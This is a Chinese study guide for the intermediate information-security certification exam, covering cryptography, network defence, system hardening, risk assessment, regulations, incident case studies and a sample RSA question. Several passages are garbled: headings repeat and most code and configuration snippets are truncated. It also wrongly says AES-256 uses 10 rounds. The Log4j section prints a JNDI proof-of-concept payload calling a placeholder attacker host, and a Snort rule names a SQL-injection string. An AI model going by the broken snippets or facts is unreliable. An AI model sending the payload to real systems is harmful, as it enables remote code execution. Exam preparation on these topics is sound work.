-
-
- 中级信息安全软考学习文档(详细扩展版)
-
(基于最新考试大纲、技术标准及实战案例)
-
- 目录
- 考试大纲深度解析
- 信息安全基础理论与模型
- 密码学与安全协议技术详解
- 网络安全核心技术及实战案例
- 系统安全、应用安全与漏洞分析
- 安全管理体系与工程实践
- 国内外法律法规与合规要求
- 经典安全事件全流程剖析
- 备考策略、模拟题与高频考点精讲
-
- 一、考试大纲深度解析
- 1.1 考试目标与能力要求
- 一、考试大纲深度解析
- 能力要求:
- 技术能力:掌握密码学、网络攻防、系统加固、安全运维等核心技术。
- 工程能力:能够设计安全方案、实施风险评估、制定应急预案。
- 合规能力:熟悉国内外法律法规,确保业务符合等保2.0、GDPR等要求。
- 1.2 知识点分值分布与高频考点
模块 | 高频考点 | 真题占比 |
密码学 | AES/RSA/SM4算法原理、数字证书签发流程、TLS握手过程 | 20% |
网络安全 | 防火墙策略配置、IPS规则编写、VPN隧道搭建、网络流量分析 | 25% |
系统安全 | Linux权限管理、Windows组策略、数据库SQL注入防御、容器安全隔离 | 20% |
安全管理 | 风险评估(定性/定量)、ISO 27001实施、应急响应流程设计 | 15% |
法律法规 | 《网络安全法》核心条款、等保2.0三级要求、GDPR数据跨境传输规则 | 10% |
案例分析 | APT攻击溯源、数据泄露事件处置、勒索软件应急响应 | 10% |
-
- 二、信息安全基础理论与模型
- 2.1 核心安全模型
- 二、信息安全基础理论与模型
- CIA三元组扩展:
- DAD三元组:泄露(Disclosure)、篡改(Alteration)、破坏(Destruction)。
- Parker六性模型:保密性、完整性、可用性、真实性、不可否认性、可控性。
- 访问控制模型对比:
| 模型 | 适用场景 | 核心规则 |
|—————-|—————————|——————————————–|
| RBAC | 企业权限管理 | 角色→权限映射,最小特权原则 |
| ABAC | 云计算动态授权 | 基于属性(用户、环境、资源)的动态策略评估 |
| Clark-Wilson| 数据完整性保护 | 认证流程(CDI→UDI转换)、职责分离 |-
- 2.2 安全威胁与攻击技术深度解析
-
- 勒索软件攻击案例:
- 事件:2023年某医院遭遇LockBit 3.0攻击,加密患者数据库,索要50 BTC。
- 攻击链:钓鱼邮件(伪装医保通知)→ 恶意宏文档 → Cobalt Strike横向渗透 → 部署勒索软件。
- 防御措施:
- 禁用Office宏执行,启用邮件附件沙箱检测。
- 定期备份并离线存储,实施网络分段隔离核心数据库。
-
- 三、密码学与安全协议技术详解
- 3.1 对称加密算法实战分析
- 三、密码学与安全协议技术详解
- AES-256加密流程:
- 步骤:密钥扩展 → 初始轮密钥加 → 10轮迭代(SubBytes、ShiftRows、MixColumns、AddRoundKey)。
- 代码示例(Python):
-
- Crypto.Cipher import AES
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
- Crypto.Cipher import AES
- 国密算法SM4应用场景:
- 政务系统加密:某省电子政务云采用SM4-CBC模式加密敏感公文传输。
- 3.2 非对称加密与数字签名
- 政务系统加密:某省电子政务云采用SM4-CBC模式加密敏感公文传输。
- RSA签名过程:
- 生成哈希(SHA-256)→ 2. 使用私钥加密哈希值 → 3. 将签名附加到原始数据。
- 漏洞案例:
- 心脏出血漏洞(Heartbleed):OpenSSL TLS心跳扩展未验证输入长度,导致服务器内存数据泄露(可获取私钥)。
- 3.3 安全协议深度剖析
- 心脏出血漏洞(Heartbleed):OpenSSL TLS心跳扩展未验证输入长度,导致服务器内存数据泄露(可获取私钥)。
- TLS 1.3握手优化:
- 握手从2-RTT减少到1-RTT,移除弱算法(如RSA密钥交换、SHA-1)。
- 抓包分析:ClientHello → ServerHello+证书+Finished → 应用数据。
- IPSec VPN配置示例:
- 场景:分支机构通过IPSec隧道连接总部内网。
- 配置命令(Cisco):
-
- isakmp policy 10
encryption aes 256
authentication pre-share
group 19
ipsec transform-set TSET esp-aes 256 esp-sha384-hmac
- isakmp policy 10
-
- 四、网络安全核心技术及实战案例
- 4.1 防火墙与入侵防御系统
- 四、网络安全核心技术及实战案例
- NGFW策略配置实战:
- 需求:禁止研发部门访问社交媒体,仅允许HTTPS流量。
- 配置示例(Palo Alto):
-
- rules name "Block_Social_Media" from "R&D" to any application "facebook,wechat" action deny
rules name "Allow_HTTPS" service https action allow
- rules name "Block_Social_Media" from "R&D" to any application "facebook,wechat" action deny
- Snort规则编写案例:
- 检测SQL注入:
-
- tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 (
msg:"SQL Injection Detected";
content:"' OR 1=1"; nocase;
sid:1000001; rev:1;
)- 4.2 高级威胁狩猎(Threat Hunting)
- tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 (
- 案例:某企业内网存在隐蔽C2通信。
- 狩猎步骤:
- 分析DNS日志(长域名、随机子域)→ 2. 抓取可疑IP流量 → 3. 发现加密C2心跳包。
- 工具链:Elasticsearch + Suricata + Wireshark。
- 狩猎步骤:
-
- 五、系统安全、应用安全与漏洞分析
- 5.1 操作系统安全加固
- 五、系统安全、应用安全与漏洞分析
- Linux安全配置:
- 禁止root远程登录:修改/etc/ssh/sshd_config → PermitRootLogin no。
- SELinux策略:
-
- 1 # 启用强制模式
semanage port -a -t ssh_port_t -p tcp 2222 # 自定义SSH端口
- 1 # 启用强制模式
- Windows组策略示例:
- 路径:gpedit.msc → 计算机配置 → Windows设置 → 安全设置 → 账户策略。
- 策略:密码复杂度启用,锁定阈值5次失败登录。
- 5.2 Web应用漏洞利用与防御
- Log4j 2漏洞(CVE-2021-44228):
- 原理:JNDI注入→远程代码执行。
- POC:${jndi:ldap://attacker.com/Exploit}。
- 修复方案:升级Log4j至2.17.0,禁用JNDI查找。
-
- 六、安全管理体系与工程实践
- 6.1 风险评估实战
- 六、安全管理体系与工程实践
- 定量分析示例:
- 资产价值(AV):数据库服务器价值100万元。
- 暴露因子(EF):遭受勒索攻击后损失60%资产。
- SLE(单次损失期望):100万 × 60% = 60万。
- ARO(年发生概率):0.3(每3年可能发生1次)。
- ALE(年度预期损失):60万 × 0.3 = 18万。
- 6.2 应急响应流程设计
- 案例:某电商平台遭DDoS攻击导致服务瘫痪。
- 响应步骤:
- 启动应急预案,切换流量至清洗中心。
- 联系ISP封堵攻击源IP段。
- 取证分析攻击流量特征(SYN Flood)。
- 事后部署CDN抗D服务。
- 响应步骤:
-
- 七、国内外法律法规与合规要求
- 7.1 等保2.0三级要求
- 七、国内外法律法规与合规要求
- 控制项:
- 物理安全:机房配备指纹门禁、视频监控。
- 数据安全:重要数据加密存储,备份周期≤7天。
- 7.2 GDPR违规处罚案例
- 事件:某跨国企业因未经用户同意共享数据至第三方,被罚款2000万欧元。
- 合规要点:
- 用户数据跨境传输需签订SCC(标准合同条款)。
- 数据主体有权要求删除个人数据(被遗忘权)。
-
- 八、经典安全事件全流程剖析
- 案例1:Equifax数据泄露(2017)
- 八、经典安全事件全流程剖析
- 攻击过程:
- 利用Apache Struts漏洞(CVE-2017-5638)入侵Web服务器。
- 横向渗透至数据库,窃取1.43亿用户敏感信息。
- 教训:
- 未及时修补已知漏洞。
- 缺乏网络分段和数据库访问监控。
- 案例2:WannaCry全球勒索攻击(2017)
- 传播机制:利用SMB协议漏洞(EternalBlue)横向感染。
- 防御方案:
- 禁用SMBv1,部署终端EDR检测异常加密行为。
-
- 九、备考策略、模拟题与高频考点精讲
- 9.1 60天高效学习计划
- 九、备考策略、模拟题与高频考点精讲
- 阶段1(1-30天):
- 每日2小时精读教材,完成章节习题(重点:密码学、网络安全)。
- 阶段2(31-45天):
- 每日1套真题(2018-2023年),总结错题知识点。
- 阶段3(46-60天):
- 模拟考试(限时3小时),针对薄弱环节专项突破。
- 9.2 高频考点模拟题
- 模拟考试(限时3小时),针对薄弱环节专项突破。
题目:某企业使用RSA算法进行数字签名,已知p=11, q=5,公钥e=7,求私钥d。
解析:
- 计算n=p×q=55,φ(n)=(11-1)×(5-1)=40。
- 求解e×d ≡1 mod 40 → 7d ≡1 mod 40 → d=23(因7×23=161≡1 mod40)。
附:安全攻防速记口诀
- 防火墙三模式:
“包过滤看五元组,状态检测跟会话,应用代理查内容。” - 密码学四原则:
“对称快,非对称慢,哈希不可逆,数字签名防抵赖。”
说明:本文档整合技术细节、实战案例与考试技巧,建议结合实验(如搭建VPN、配置WAF)加深理解。祝您一战通关!